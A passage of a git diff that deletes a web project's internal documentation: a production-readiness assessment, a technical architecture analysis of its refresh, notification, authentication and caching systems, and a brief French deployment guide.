`lib/utils/request-deduplication.ts` - console.log statements -- Many more throughout the codebase - -**Recommendations:** -- [ ] Replace all `console.log` with proper logger calls -- [ ] Implement request timeout middleware -- [ ] Add input validation middleware (Zod schemas) -- [ ] Standardize error response format - -### 3.3 Error Handling - -**Status:** ⚠️ **Inconsistent** - -**Good Practices Found:** -- ✅ Structured logging with logger utility -- ✅ Try-catch blocks in most API routes -- ✅ Error cleanup in mission creation (file deletion on failure) - -**Issues:** -- ⚠️ Some errors return generic messages without context -- ⚠️ No global error boundary for API routes -- ⚠️ Database errors not always handled gracefully - -**Recommendations:** -- [ ] Implement global error handler middleware -- [ ] Add error codes for better client-side handling -- [ ] Implement retry logic for transient failures -- [ ] Add circuit breakers for external service calls - ---- - -## 4. Database & Data Management - -### 4.1 Database Schema - -**Status:** ✅ **Good** - -- ✅ Prisma ORM with proper schema definition -- ✅ Indexes on foreign keys and frequently queried fields -- ✅ Cascade deletes configured appropriately -- ✅ UUID primary keys - -**Concerns:** -- ⚠️ No database migration rollback strategy documented -- ⚠️ No data retention policies defined - -**Recommendations:** -- [ ] Document migration rollback procedures -- [ ] Define data retention policies -- [ ] Add database versioning strategy - -### 4.2 Connection Management - -**Status:** ⚠️ **Needs Configuration** - -**Current State:** -- Prisma Client with default connection pooling -- No explicit connection pool configuration -- Redis connection with retry logic (good) - -**Issues:** -- No connection pool size limits -- No connection timeout configuration -- Potential connection exhaustion under load - -**Recommendations:** -- [ ] Configure Prisma connection pool: - ```prisma - datasource db { - provider = "postgresql" - url = env("DATABASE_URL") - // Add connection pool settings - } - ``` -- [ ] Set appropriate pool size based on Vercel function concurrency -- [ ] Add connection monitoring - -### 4.3 Data Backup & Recovery - -**Status:** ⚠️ **Incomplete** - -**Current State:** -- ✅ Backup procedures documented in RUNBOOK.md -- ❌ No automated backup system -- ❌ No backup retention policy -- ❌ No backup testing procedure - -**Recommendations:** -- [ ] Implement automated daily backups -- [ ] Set up backup retention (30 days minimum) -- [ ] Test restore procedures monthly -- [ ] Add backup verification checks - ---- - -## 5. Testing - -### 5.1 Test Coverage - -**Status:** 🔴 **CRITICAL - NO TESTS FOUND** - -**Current State:** -- ❌ No unit tests -- ❌ No integration tests -- ❌ No E2E tests -- ❌ No test infrastructure - -**Impact:** HIGH - No confidence in code changes, high risk of regressions - -**Recommendations:** -- [ ] **MUST IMPLEMENT:** Set up Jest/Vitest for unit tests -- [ ] Add integration tests for critical API routes -- [ ] Implement E2E tests for critical user flows -- [ ] Set up CI/CD to run tests on every PR -- [ ] Target: 70%+ code coverage for critical paths - -**Priority Test Areas:** -1. Authentication flows -2. Mission creation/update/deletion -3. File upload handling -4. Calendar sync operations -5. Email integration - ---- - -## 6. Performance & Scalability - -### 6.1 Performance Optimizations - -**Status:** ⚠️ **Partial** - -**Good Practices:** -- ✅ Redis caching implemented -- ✅ Request deduplication for email operations -- ✅ Connection pooling for IMAP -- ✅ Background refresh for unread counts - -**Missing:** -- ❌ No CDN for static assets -- ❌ No image optimization pipeline -- ❌ No query result pagination on some endpoints -- ❌ No database query optimization monitoring - -**Recommendations:** -- [ ] Implement CDN (Vercel Edge Network or Cloudflare) -- [ ] Add image optimization (Next.js Image component) -- [ ] Add pagination to all list endpoints -- [ ] Set up query performance monitoring -- [ ] Implement database query logging in development - -### 6.2 Scalability Concerns - -**Status:** ⚠️ **Needs Planning** - -**Potential Bottlenecks:** -1. **Database Connections:** Serverless functions may exhaust pool -2. **Redis Connection:** Single Redis instance (no clustering) -3. **File Storage:** No CDN, direct S3 access -4. **External APIs:** No circuit breakers for N8N, Leantime, etc. - -**Recommendations:** -- [ ] Plan for database read replicas -- [ ] Consider Redis Cluster for high availability -- [ ] Implement circuit breakers for external services -- [ ] Add load testing before production launch - ---- - -## 7. Monitoring & Observability - -### 7.1 Logging - -**Status:** ✅ **Good** - -- ✅ Structured logging with logger utility -- ✅ Log levels (info, warn, error, debug) -- ✅ Contextual information in logs - -**Issues:** -- ⚠️ Console.log statements still present (80+ instances) -- ⚠️ No log aggregation system configured -- ⚠️ No log retention policy - -**Recommendations:** -- [ ] Remove all console.log statements -- [ ] Set up log aggregation (Logtail, Datadog, or similar) -- [ ] Define log retention policy -- [ ] Add request ID tracking for distributed tracing - -### 7.2 Monitoring - -**Status:** ⚠️ **Basic** - -**Current State:** -- ✅ Health check endpoint (`/api/health`) -- ✅ Vercel Analytics available -- ❌ No APM (Application Performance Monitoring) -- ❌ No error tracking (Sentry not configured) -- ❌ No uptime monitoring - -**Recommendations:** -- [ ] Set up Sentry for error tracking -- [ ] Configure Vercel Analytics and Speed Insights -- [ ] Add uptime monitoring (Uptime Robot, Pingdom) -- [ ] Implement custom metrics dashboard -- [ ] Set up alerting for critical errors - -### 7.3 Observability - -**Status:** ⚠️ **Incomplete** - -**Documentation:** -- ✅ Comprehensive OBSERVABILITY.md document -- ❌ Not all recommendations implemented - -**Missing:** -- No distributed tracing -- No performance profiling -- No database query monitoring - -**Recommendations:** -- [ ] Implement distributed tracing (OpenTelemetry) -- [ ] Add performance profiling for slow endpoints -- [ ] Set up database query monitoring (pg_stat_statements) - ---- - -## 8. Documentation - -### 8.1 Technical Documentation - -**Status:** ✅ **Excellent** - -**Strengths:** -- ✅ Comprehensive DEPLOYMENT.md -- ✅ Detailed RUNBOOK.md with procedures -- ✅ OBSERVABILITY.md with monitoring strategy -- ✅ Multiple issue analysis documents -- ✅ API documentation in code comments - -**Recommendations:** -- [ ] Add API documentation (OpenAPI/Swagger) -- [ ] Document all environment variables in one place -- [ ] Create architecture diagram -- [ ] Add troubleshooting guide - -### 8.2 Operational Documentation - -**Status:** ✅ **Good** - -- ✅ Runbook with incident procedures -- ✅ Deployment procedures documented -- ✅ Rollback procedures defined - -**Missing:** -- On-call rotation documentation -- Escalation procedures -- Service level objectives (SLOs) - ---- - -## 9. Deployment & DevOps - -### 9.1 CI/CD Pipeline - -**Status:** ⚠️ **Basic** - -**Current State:** -- ✅ Vercel automatic deployments from Git -- ❌ No pre-deployment checks -- ❌ No automated testing in pipeline -- ❌ No staging environment mentioned - -**Recommendations:** -- [ ] Set up staging environment -- [ ] Add pre-deployment checks (tests, linting, type checking) -- [ ] Implement deployment gates -- [ ] Add automated smoke tests post-deployment - -### 9.2 Environment Management - -**Status:** ⚠️ **Needs Improvement** - -**Issues:** -- No `.env.example` file found -- Environment variables scattered across documentation -- No validation script for required variables - -**Recommendations:** -- [ ] Create comprehensive `.env.example` -- [ ] Add environment validation script -- [ ] Document all required variables in one place -- [ ] Use secrets manager for production (Vercel Secrets) - ---- - -## 10. Risk Assessment - -### 10.1 High-Risk Areas - -| Risk | Severity | Likelihood | Mitigation Priority | -|------|----------|------------|---------------------| -| No tests = production bugs | HIGH | HIGH | **CRITICAL** | -| TypeScript errors ignored | HIGH | MEDIUM | **CRITICAL** | -| No rate limiting = DDoS risk | HIGH | MEDIUM | **HIGH** | -| Database connection exhaustion | MEDIUM | MEDIUM | **HIGH** | -| Missing environment validation | MEDIUM | HIGH | **HIGH** | -| No automated backups | HIGH | LOW | **MEDIUM** | -| Console.log in production | LOW | HIGH | **MEDIUM** | - -### 10.2 Production Readiness Checklist - -#### Critical (Must Fix Before Production) -- [ ] Remove TypeScript/ESLint error suppression -- [ ] Fix all TypeScript errors -- [ ] Implement rate limiting -- [ ] Remove all console.log statements -- [ ] Complete environment variable validation -- [ ] Set up basic test suite (at least for critical paths) -- [ ] Security audit of configuration files - -#### High Priority (Fix Within 1-2 Weeks) -- [ ] Configure database connection pooling -- [ ] Implement request timeout middleware -- [ ] Add input validation to all API routes -- [ ] Set up error tracking (Sentry) -- [ ] Configure automated backups -- [ ] Add API documentation - -#### Medium Priority (Fix Within 1 Month) -- [ ] Set up staging environment -- [ ] Implement CDN -- [ ] Add comprehensive test coverage -- [ ] Set up APM -- [ ] Create architecture diagrams -- [ ] Implement circuit breakers - ---- - -## 11. Recommendations Summary - -### Immediate Actions (Before Production) - -1. **🔴 CRITICAL: Fix Build Configuration** - ```javascript - // next.config.mjs - REMOVE these lines: - eslint: { ignoreDuringBuilds: true }, - typescript: { ignoreBuildErrors: true }, - ``` - Then fix all resulting errors. - -2. **🔴 CRITICAL: Implement Rate Limiting** - - Use `@upstash/ratelimit` with Redis - - Apply to all API endpoints - - Configure per-endpoint limits - -3. **🔴 CRITICAL: Remove Console.log Statements** - - Replace with logger calls - - Use grep to find all instances - - Set up pre-commit hook to prevent new ones - -4. **🔴 CRITICAL: Complete Environment Validation** - - Expand `lib/env.ts` schema - - Validate all required variables - - Fail fast on missing variables - -5. **🟡 HIGH: Set Up Basic Testing** - - Install Jest/Vitest - - Write tests for critical API routes - - Set up CI to run tests - -### Short-Term Improvements (1-2 Weeks) - -6. Configure database connection pooling -7. Implement request timeout middleware -8. Add input validation middleware -9. Set up Sentry for error tracking -10. Configure automated backups -11. Create comprehensive `.env.example` - -### Long-Term Enhancements (1 Month+) - -12. Set up staging environment -13. Implement comprehensive test coverage (70%+) -14. Add CDN for static assets -15. Set up APM and distributed tracing -16. Create API documentation (OpenAPI) -17. Implement circuit breakers for external services - ---- - -## 12. Conclusion - -### Production Readiness: **CONDITIONAL** - -The Neah platform has a **solid foundation** with good architecture, comprehensive documentation, and modern technology choices. However, **critical issues must be addressed** before production deployment. - -### Estimated Time to Production-Ready: **2-3 Weeks** - -**Minimum Requirements Met:** -- ✅ Health check endpoint -- ✅ Error handling (basic) -- ✅ Logging infrastructure -- ✅ Database migrations -- ✅ Docker configuration - -**Critical Gaps:** -- ❌ No testing infrastructure -- ❌ Build errors suppressed -- ❌ No rate limiting -- ❌ Security concerns (console.log, missing validation) - -### Recommendation - -**DO NOT DEPLOY TO PRODUCTION** until: -1. TypeScript/ESLint errors are fixed (remove suppression) -2. Rate limiting is implemented -3. Basic test suite is in place -4. All console.log statements are removed -5. Environment variable validation is complete - -**After addressing critical issues**, the platform should be **production-ready** with ongoing monitoring and gradual rollout recommended. - ---- - -## Appendix: Quick Reference - -### Critical Files to Review -- `next.config.mjs` - Remove error suppression -- `lib/env.ts` - Complete validation schema -- `app/api/**/*.ts` - Add rate limiting, remove console.log -- `package.json` - Add test scripts and dependencies - -### Key Metrics to Monitor -- API response times -- Error rates -- Database connection pool usage -- Redis memory usage -- External API call success rates - -### Emergency Contacts -- See RUNBOOK.md for escalation procedures -- Vercel Support: https://vercel.com/support - ---- - -**Assessment Completed:** January 2026 -**Next Review:** After critical fixes implemented diff --git a/PROJECT_DEEP_ANALYSIS.md b/PROJECT_DEEP_ANALYSIS.md deleted file mode 100644 index d3f05c0..0000000 --- a/PROJECT_DEEP_ANALYSIS.md +++ /dev/null @@ -1,753 +0,0 @@ -# Neah Project - Deep Technical Analysis - -## Executive Summary - -This document provides a comprehensive analysis of the Neah project architecture, focusing on: -- Update Services & Refresh Management -- Widgets Architecture -- Notifications System -- Authentication & Token Refresh -- Performance & Memory Management -- API Routes Tracing - ---- - -## 1. Update Services & Refresh Management - -### 1.1 Unified Refresh Manager (`lib/services/refresh-manager.ts`) - -**Architecture:** -- **Singleton Pattern**: Single instance manages all refresh operations -- **Resource-Based**: Each refreshable resource has its own configuration -- **Deduplication**: Prevents duplicate refresh requests -- **Interval Management**: Centralized interval control - -**Refreshable Resources:** -```typescript -type RefreshableResource = - | 'notifications' - | 'notifications-count' - | 'calendar' - | 'news' - | 'email' - | 'parole' - | 'duties' - | 'navbar-time'; -``` - -**Key Features:** - -1. **Request Deduplication** - - Minimum 1 second between refreshes for same resource - - Tracks pending requests to prevent duplicates - - Uses `pendingRequests` Map with promise tracking - -2. **Interval Management** - - Each resource can have different refresh intervals - - Automatic cleanup on unregister - - Pause/Resume functionality for all resources - -3. **Error Handling** - - Errors don't update `lastRefresh` timestamp (allows retry) - - Comprehensive logging for debugging - - Graceful degradation on failures - -**Memory Impact:** -- **Low**: Uses Maps for efficient lookups -- **Cleanup**: Proper cleanup on component unmount -- **Potential Issue**: If components don't unregister, intervals persist - -**Performance Considerations:** -- ✅ Deduplication prevents unnecessary API calls -- ✅ Minimum 1s throttle prevents excessive refreshes -- ⚠️ Multiple resources = multiple intervals (but necessary) -- ⚠️ No priority-based scheduling (all resources treated equally) - -### 1.2 Unified Refresh Hook (`hooks/use-unified-refresh.ts`) - -**Purpose:** React hook wrapper for RefreshManager - -**Key Features:** -- Automatic registration/unregistration on mount/unmount -- Session-aware (only active when authenticated) -- Callback ref pattern to avoid stale closures -- Manual refresh trigger with force option - -**Usage Pattern:** -```typescript -const { refresh, isActive } = useUnifiedRefresh({ - resource: 'calendar', - interval: 300000, // 5 minutes - enabled: status === 'authenticated', - onRefresh: fetchEvents, - priority: 'low', -}); -``` - -**Memory Leak Prevention:** -- ✅ Cleanup in useEffect return -- ✅ isMountedRef prevents state updates after unmount -- ✅ Automatic unregister on unmount - ---- - -## 2. Widgets Architecture - -### 2.1 Widget Components Overview - -**Main Dashboard Widgets** (`app/page.tsx`): -1. **QuoteCard** - Inspirational quotes -2. **Calendar** - Upcoming events (7 events) -3. **News** - News articles (100 limit) -4. **Duties** - Leantime tasks (7 tasks) -5. **Email** - Email preview (5 emails) -6. **Parole** - RocketChat messages - -### 2.2 Widget Refresh Patterns - -**Current Implementation Issues:** - -1. **Calendar Widget** (`components/calendar.tsx`) - - ❌ No unified refresh integration - - ❌ Manual refresh only via button - - ❌ Fetches on mount only - - ⚠️ Uses `?refresh=true` parameter (bypasses cache) - -2. **News Widget** (`components/news.tsx`) - - ❌ No unified refresh integration - - ✅ Manual refresh button - - ✅ Fetches on authentication - - ⚠️ Uses `?refresh=true` parameter - -3. **Email Widget** (`components/email.tsx`) - - ❌ No unified refresh integration - - ✅ Manual refresh button - - ⚠️ Fetches on mount only - - ⚠️ Uses `?refresh=true` parameter - -4. **Parole Widget** (`components/parole.tsx`) - - ❌ No unified refresh integration - - ⚠️ **Custom polling**: `setInterval(() => fetchMessages(), 30000)` (30s) - - ⚠️ **Memory Leak Risk**: Interval not cleared if component unmounts during fetch - - ✅ Manual refresh button - -5. **Duties Widget** (`components/flow.tsx`) - - ❌ No unified refresh integration - - ❌ Fetches on mount only - - ⚠️ Uses `?refresh=true` parameter - -### 2.3 Widget Memory & Performance Issues - -**Critical Issues:** - -1. **Multiple Polling Mechanisms** - - Parole widget uses `setInterval` (30s) - - No coordination with RefreshManager - - Risk of memory leaks if cleanup fails - -2. **Cache Bypassing** - - Most widgets use `?refresh=true` - - Bypasses Redis cache - - Increases server load - -3. **No Unified Refresh** - - Widgets don't use `useUnifiedRefresh` hook - - Inconsistent refresh patterns - - Hard to manage globally - -4. **State Management** - - Each widget manages its own state - - No shared state/cache - - Potential duplicate API calls - -**Recommendations:** -- ✅ Migrate all widgets to use `useUnifiedRefresh` -- ✅ Remove custom `setInterval` implementations -- ✅ Use cache-first strategy (remove `?refresh=true` by default) -- ✅ Implement widget-level error boundaries - ---- - -## 3. Notifications System - -### 3.1 Architecture Overview - -**Service Pattern:** Singleton with adapter pattern - -**Location:** `lib/services/notifications/notification-service.ts` - -**Adapters:** -- `LeantimeAdapter` (implemented) -- NextcloudAdapter (planned) -- GiteaAdapter (planned) -- DolibarrAdapter (planned) -- MoodleAdapter (planned) - -### 3.2 Caching Strategy - -**Redis Cache Keys:** -```typescript -NOTIFICATION_COUNT_CACHE_KEY = `notifications:count:${userId}` -NOTIFICATIONS_LIST_CACHE_KEY = `notifications:list:${userId}:${page}:${limit}` -``` - -**Cache TTL:** -- Count cache: 30 seconds -- List cache: 30 seconds -- Refresh lock: 30 seconds - -**Cache Invalidation:** -- On `markAsRead`: Invalidates all user caches -- Uses Redis SCAN for pattern matching -- Prevents blocking operations - -### 3.3 Refresh Management - -**Integration with RefreshManager:** -- ✅ Uses unified refresh system -- ✅ Registered as 'notifications' and 'notifications-count' -- ✅ 30-second refresh interval (aligned with cache TTL) - -**Hook Usage** (`hooks/use-notifications.ts`): -- Request deduplication (2-second window) -- Automatic refresh on mount -- Manual refresh capability -- Error handling with retry - -### 3.4 Performance Characteristics - -**Strengths:** -- ✅ Redis caching reduces database load -- ✅ Adapter pattern allows easy extension -- ✅ Parallel fetching from multiple adapters -- ✅ Request deduplication prevents duplicate calls - -**Potential Issues:** -- ⚠️ SCAN operations can be slow with many keys -- ⚠️ No pagination limits on adapter results -- ⚠️ All adapters fetched in parallel (could be optimized) - -**Memory Impact:** -- **Low**: Cached data in Redis, not memory -- **Medium**: Notification objects in React state -- **Low**: Adapter instances are singletons - ---- - -## 4. Authentication & Token Refresh - -### 4.1 Keycloak Integration - -**Provider:** NextAuth with KeycloakProvider - -**Location:** `app/api/auth/options.ts` - -### 4.2 Token Refresh Flow - -**JWT Callback Logic:** - -1. **Initial Sign-In:** - - Stores access token, refresh token, ID token - - Extracts roles from access token - - Sets expiration timestamp - -2. **Subsequent Requests:** - - Checks if token is expired - - If expired, calls `refreshAccessToken()` - - Updates token with new values - -**Refresh Function** (`refreshAccessToken`): - -```typescript -async function refreshAccessToken(token: ExtendedJWT) { - // Calls Keycloak token endpoint - // Handles various error scenarios: - // - SessionNotActive (user logged out) - // - RefreshTokenExpired (inactivity) - // - InvalidGrant (session invalidated) -} -``` - -**Error Handling:** -- ✅ Detects session invalidation -- ✅ Handles refresh token expiration -- ✅ Clears tokens on critical errors -- ✅ Returns null session to trigger re-auth - -### 4.3 Session Management - -**Session Configuration:** -- Strategy: JWT (stateless) -- Max Age: 4 hours (14,400 seconds) -- Automatic refresh on activity - -**Cookie Configuration:** -- HttpOnly: true -- SameSite: 'lax' -- Secure: Based on NEXTAUTH_URL - -### 4.4 Email OAuth Token Refresh - -**Service:** `lib/services/token-refresh.ts` - -**Purpose:** Refresh Microsoft OAuth tokens for email access - -**Flow:** -1. Check Redis cache for credentials -2. If cache miss, check Prisma database -3. Validate token expiration (5-minute buffer) -4. Refresh if needed via Microsoft OAuth -5. Update both Redis and Prisma - -**Dual Storage:** -- **Redis**: Fast access, 24-hour TTL -- **Prisma**: Persistent storage, survives Redis restarts - -**Memory Impact:** -- **Low**: Credentials stored in Redis/DB, not memory -- **Medium**: Token refresh operations are async -- **Low**: No memory leaks (proper cleanup) - -### 4.5 Performance Considerations - -**Token Refresh Frequency:** -- Keycloak: On every request if expired -- Email OAuth: Only when expired (5-min buffer) - -**Optimization Opportunities:** -- ⚠️ Token refresh happens synchronously in JWT callback -- ⚠️ Could implement background refresh -- ✅ Caching reduces refresh frequency - ---- - -## 5. Performance & Memory Management - -### 5.1 Next.js Configuration - -**Build Configuration** (`next.config.mjs`): -```javascript -experimental: { - webpackBuildWorker: true, - parallelServerBuildTraces: true, - parallelServerCompiles: true, -} -``` - -**Memory Impact:** -- ✅ Parallel builds reduce build time -- ⚠️ Multiple workers increase memory during build -- ✅ Production builds are optimized - -### 5.2 Redis Connection Management - -**Singleton Pattern** (`lib/redis.ts`): -- Single Redis client instance -- Connection pooling -- Automatic reconnection with retry strategy - -**Memory Impact:** -- **Low**: Single connection per process -- **Medium**: Connection pool (if configured) -- **Low**: Proper cleanup on disconnect - -**Connection Strategy:** -- Max reconnect attempts: 5 -- Exponential backoff -- Connection timeout: 10 seconds -- Keep-alive: 10 seconds - -### 5.3 Caching Strategy - -**Redis Cache TTLs:** -```typescript -CREDENTIALS: 24 hours -SESSION: 4 hours -EMAIL_LIST: 5 minutes -EMAIL_CONTENT: 15 minutes -CALENDAR: 10 minutes -NEWS: 15 minutes -TASKS: 10 minutes -MESSAGES: 2 minutes -NOTIFICATIONS: 30 seconds -``` - -**Memory Impact:** -- **Low**: Data in Redis, not application memory -- **Medium**: Large cache can consume Redis memory -- **Low**: TTL ensures automatic cleanup - -### 5.4 Component Memory Management - -**Potential Memory Leaks:** - -1. **Parole Widget** (`components/parole.tsx`): - ```typescript - // ⚠️ RISK: Interval might not clear if component unmounts during fetch - useEffect(() => { - if (status === 'authenticated') { - fetchMessages(); - const interval = setInterval(() => fetchMessages(), 30000); - return () => clearInterval(interval); // ✅ Good, but... - } - }, [status]); - ``` - **Issue**: If `fetchMessages()` is async and component unmounts, state updates may occur - -2. **Widget State:** - - Each widget maintains its own state - - No cleanup on unmount for pending requests - - Potential memory leaks with large data arrays - -3. **Event Listeners:** - - No evidence of unregistered event listeners - - ✅ React handles most cleanup automatically - -### 5.5 API Route Performance - -**Common Patterns:** - -1. **Session Validation:** - ```typescript - const session = await getServerSession(authOptions); - ``` - - Called on every request - - JWT validation overhead - - Could be optimized with middleware - -2. **Database Queries:** - - Prisma ORM adds overhead - - No query optimization visible - - Connection pooling handled by Prisma - -3. **Redis Operations:** - - Most routes check cache first - - SCAN operations for pattern matching - - Could be optimized with better key patterns - -### 5.6 Memory Optimization Recommendations - -**High Priority:** -1. ✅ Fix Parole widget interval cleanup -2. ✅ Migrate widgets to unified refresh -3. ✅ Implement request cancellation for unmounted components -4. ✅ Add error boundaries to prevent memory leaks - -**Medium Priority:** -1. ⚠️ Implement API route middleware for auth -2. ⚠️ Optimize Redis SCAN operations -3. ⚠️ Add request timeout handling -4. ⚠️ Implement connection pooling for external APIs - -**Low Priority:** -1. ⚠️ Consider React Query for state management -2. ⚠️ Implement virtual scrolling for large lists -3. ⚠️ Add memory profiling tools - ---- - -## 6. API Routes Tracing - -### 6.1 Logging Infrastructure - -**Logger** (`lib/logger.ts`): -- Environment-aware (silent in production for debug/info) -- Always logs errors -- Simple console-based logging - -**Limitations:** -- ❌ No structured logging (JSON) -- ❌ No log levels in production -- ❌ No centralized log aggregation -- ❌ No request tracing IDs - -### 6.2 Current Logging Patterns - -**API Routes:** -- 343 `console.log/error/warn` calls across 68 files -- Inconsistent logging patterns -- Some routes have detailed logging, others minimal - -**Examples:** - -1. **Good Logging** (`app/api/missions/mission-created/route.ts`): - ```typescript - logger.debug('Mission Created Webhook Received'); - logger.debug('Received mission-created data', { ... }); - ``` - -2. **Inconsistent Logging** (`app/api/courrier/route.ts`): - ```typescript - console.log(`[API] Received request with: ...`); - // Mix of console.log and logger - ``` - -### 6.3 API Route Categories - -**Authentication Routes:** -- `/api/auth/[...nextauth]` - NextAuth handler -- `/api/auth/refresh-keycloak-session` - Session refresh -- `/api/auth/debug-keycloak` - Debug endpoint - -**Email Routes (Courrier):** -- `/api/courrier` - Email list -- `/api/courrier/emails` - Email list (alternative) -- `/api/courrier/[id]` - Single email -- `/api/courrier/refresh` - Token refresh -- `/api/courrier/session` - IMAP session -- `/api/courrier/account` - Account management - -**Calendar Routes:** -- `/api/calendars` - Calendar list -- `/api/calendars/[id]` - Single calendar -- `/api/calendars/[id]/events` - Calendar events -- `/api/events` - Event CRUD - -**Notification Routes:** -- `/api/notifications` - Notification list -- `/api/notifications/count` - Notification count -- `/api/notifications/[id]/read` - Mark as read -- `/api/notifications/read-all` - Mark all as read - -**Mission Routes:** -- `/api/missions` - Mission list -- `/api/missions/[missionId]` - Single mission -- `/api/missions/upload` - File upload -- `/api/missions/mission-created` - Webhook handler - -### 6.4 Tracing Recommendations - -**Immediate Improvements:** - -1. **Request ID Tracking:** - ```typescript - // Add to middleware or API route wrapper - const requestId = crypto.randomUUID(); - logger.info('Request started', { requestId, path, method }); - ``` - -2. **Structured Logging:** - ```typescript - logger.info('API Request', { - requestId, - method, - path, - userId, - duration: Date.now() - startTime, - }); - ``` - -3. **Error Tracking:** - ```typescript - logger.error('API Error', { - requestId, - error: error.message, - stack: error.stack, - path, - userId, - }); - ``` - -4. **Performance Monitoring:** - ```typescript - const startTime = Date.now(); - // ... route logic - logger.debug('API Response', { - requestId, - duration: Date.now() - startTime, - statusCode, - }); - ``` - -**Advanced Tracing:** - -1. **OpenTelemetry Integration:** - - Distributed tracing - - Performance metrics - - Error tracking - -2. **APM Tools:** - - New Relic - - Datadog - - Sentry - -3. **Custom Middleware:** - ```typescript - // app/api/middleware.ts - export function withTracing(handler: Function) { - return async (req: Request, res: Response) => { - const requestId = crypto.randomUUID(); - const startTime = Date.now(); - - try { - const result = await handler(req, res); - logger.info('Request completed', { - requestId, - duration: Date.now() - startTime, - }); - return result; - } catch (error) { - logger.error('Request failed', { - requestId, - error, - duration: Date.now() - startTime, - }); - throw error; - } - }; - } - ``` - -### 6.5 API Route Performance Metrics - -**Current State:** -- ❌ No performance metrics collected -- ❌ No request duration tracking -- ❌ No error rate monitoring -- ❌ No cache hit/miss tracking - -**Recommended Metrics:** -1. Request duration (p50, p95, p99) -2. Error rate by route -3. Cache hit/miss ratio -4. Database query count -5. Redis operation count -6. External API call duration - ---- - -## 7. Critical Issues & Recommendations - -### 7.1 Critical Issues - -1. **Memory Leak Risk - Parole Widget** - - Custom `setInterval` without proper cleanup - - **Fix**: Migrate to `useUnifiedRefresh` - -2. **Inconsistent Refresh Patterns** - - Widgets don't use unified refresh system - - **Fix**: Migrate all widgets to `useUnifiedRefresh` - -3. **Cache Bypassing** - - Widgets use `?refresh=true` by default - - **Fix**: Use cache-first strategy - -4. **No Request Tracing** - - Difficult to debug production issues - - **Fix**: Implement request ID tracking - -5. **No Performance Monitoring** - - No visibility into slow routes - - **Fix**: Add performance metrics - -### 7.2 High Priority Recommendations - -1. ✅ Migrate all widgets to unified refresh system -2. ✅ Fix Parole widget interval cleanup -3. ✅ Implement request ID tracking -4. ✅ Add performance metrics -5. ✅ Standardize logging patterns - -### 7.3 Medium Priority Recommendations - -1. ⚠️ Implement API route middleware -2. ⚠️ Optimize Redis SCAN operations -3. ⚠️ Add error boundaries -4. ⚠️ Implement request cancellation -5. ⚠️ Add structured logging - -### 7.4 Low Priority Recommendations - -1. ⚠️ Consider React Query -2. ⚠️ Implement virtual scrolling -3. ⚠️ Add memory profiling -4. ⚠️ Consider OpenTelemetry -5. ⚠️ Add APM tooling - ---- - -## 8. Architecture Strengths - -### 8.1 Well-Designed Components - -1. **Unified Refresh Manager** - - Excellent abstraction - - Proper deduplication - - Clean API - -2. **Notification Service** - - Adapter pattern allows extension - - Good caching strategy - - Proper error handling - -3. **Redis Integration** - - Comprehensive caching - - Proper TTL management - - Good key naming conventions - -4. **Token Refresh** - - Dual storage (Redis + Prisma) - - Proper error handling - - Automatic refresh - -### 8.2 Code Quality - -- ✅ TypeScript throughout -- ✅ Consistent component structure -- ✅ Proper error handling in most places -- ✅ Good separation of concerns - ---- - -## 9. Conclusion - -The Neah project demonstrates a well-architected Next.js application with several sophisticated systems: - -**Strengths:** -- Unified refresh management system -- Comprehensive caching strategy -- Robust authentication flow -- Extensible notification system - -**Areas for Improvement:** -- Widget refresh consistency -- Memory leak prevention -- API route tracing -- Performance monitoring - -**Overall Assessment:** -The codebase is production-ready but would benefit from the recommended improvements, particularly around widget refresh management and observability. - ---- - -## Appendix: File Reference Map - -### Core Services -- `lib/services/refresh-manager.ts` - Unified refresh management -- `lib/services/notifications/notification-service.ts` - Notification system -- `lib/services/token-refresh.ts` - Email OAuth token refresh -- `lib/redis.ts` - Redis caching utilities -- `lib/logger.ts` - Logging utility - -### Hooks -- `hooks/use-unified-refresh.ts` - Unified refresh hook -- `hooks/use-notifications.ts` - Notification hook - -### Widgets -- `components/calendar.tsx` - Calendar widget -- `components/news.tsx` - News widget -- `components/email.tsx` - Email widget -- `components/parole.tsx` - Messages widget -- `components/flow.tsx` - Tasks widget - -### API Routes -- `app/api/auth/options.ts` - NextAuth configuration -- `app/api/notifications/` - Notification endpoints -- `app/api/courrier/` - Email endpoints -- `app/api/calendars/` - Calendar endpoints - ---- - -*Document generated: 2024* -*Last updated: Analysis session* - diff --git a/README.DEPLOYMENT.md b/README.DEPLOYMENT.md deleted file mode 100644 index 457ff8b..0000000 --- a/README.DEPLOYMENT.md +++ /dev/null @@ -1,66 +0,0 @@ -# Guide de Déploiement - Neah - -Ce document fournit un aperçu rapide des ressources de déploiement disponibles pour Neah. - -## 📚 Documentation - -- **[DEPLOYMENT.md](docs/DEPLOYMENT.md)**: Guide complet de déploiement étape par étape -- **[RUNBOOK.md](docs/RUNBOOK.md)**: Procédures opérationnelles (déploiement, incidents, rollback) -- **[OBSERVABILITY.md](docs/OBSERVABILITY.md)**: Stratégie de monitoring et observabilité - -## 🚀 Déploiement rapide - -### Prérequis - -1. Compte Vercel configuré -2. Serveur PostgreSQL auto-hébergé -3. Variables d'environnement configurées (voir `.env.example`) - -### Étapes - -1. **Configurer les variables d'environnement** - - Copiez `.env.example` et remplissez les valeurs pour la production. - -2. **Vérifier la configuration** - - ```bash - ./scripts/verify-vercel-config.sh - ``` - -3. **Appliquer les migrations Prisma** - - ```bash - export DATABASE_URL="postgresql://..." - ./scripts/migrate-prod.sh - ``` - -4. **Déployer sur Vercel** - - ```bash - git push origin main - # Vercel déploiera automatiquement - ``` - -## 📁 Fichiers importants - -- `.env.example`: Liste complète des variables d'environnement -- `docker-compose.prod.yml`: Configuration Docker pour PostgreSQL/Redis en production -- `vercel.json`: Configuration Vercel -- `scripts/migrate-prod.sh`: Script de migration Prisma pour la production -- `scripts/verify-vercel-config.sh`: Script de vérification de configuration - -## 🔍 Vérifications post-déploiement - -1. Health check: `GET /api/health` -2. Vérifier les logs Vercel -3. Tester l'authentification -4. Vérifier les fonctionnalités critiques - -## 🆘 En cas de problème - -Consultez [RUNBOOK.md](docs/RUNBOOK.md) pour les procédures d'incident et de rollback. - -## 📞 Support - -Pour toute question sur le déploiement, contactez l'équipe Neah. diff --git a/REALTIME_NOTIFICATIONS_IMPLEMENTATION.md b/REALTIME_NOTIFICATIONS_IMPLEMENTATION.md deleted file mode 100644 index 4ff063f..0000000 --- a/REALTIME_NOTIFICATIONS_IMPLEMENTATION.md +++ /dev/null @@ -1,211 +0,0 @@ -# ⚡ Implémentation : Notifications en Temps Réel - -## ✅ Système Implémenté - -Un système **hybride** combinant polling et event-driven pour des notifications instantanées. - ---- - -## 🔧 Composants Créés/Modifiés - 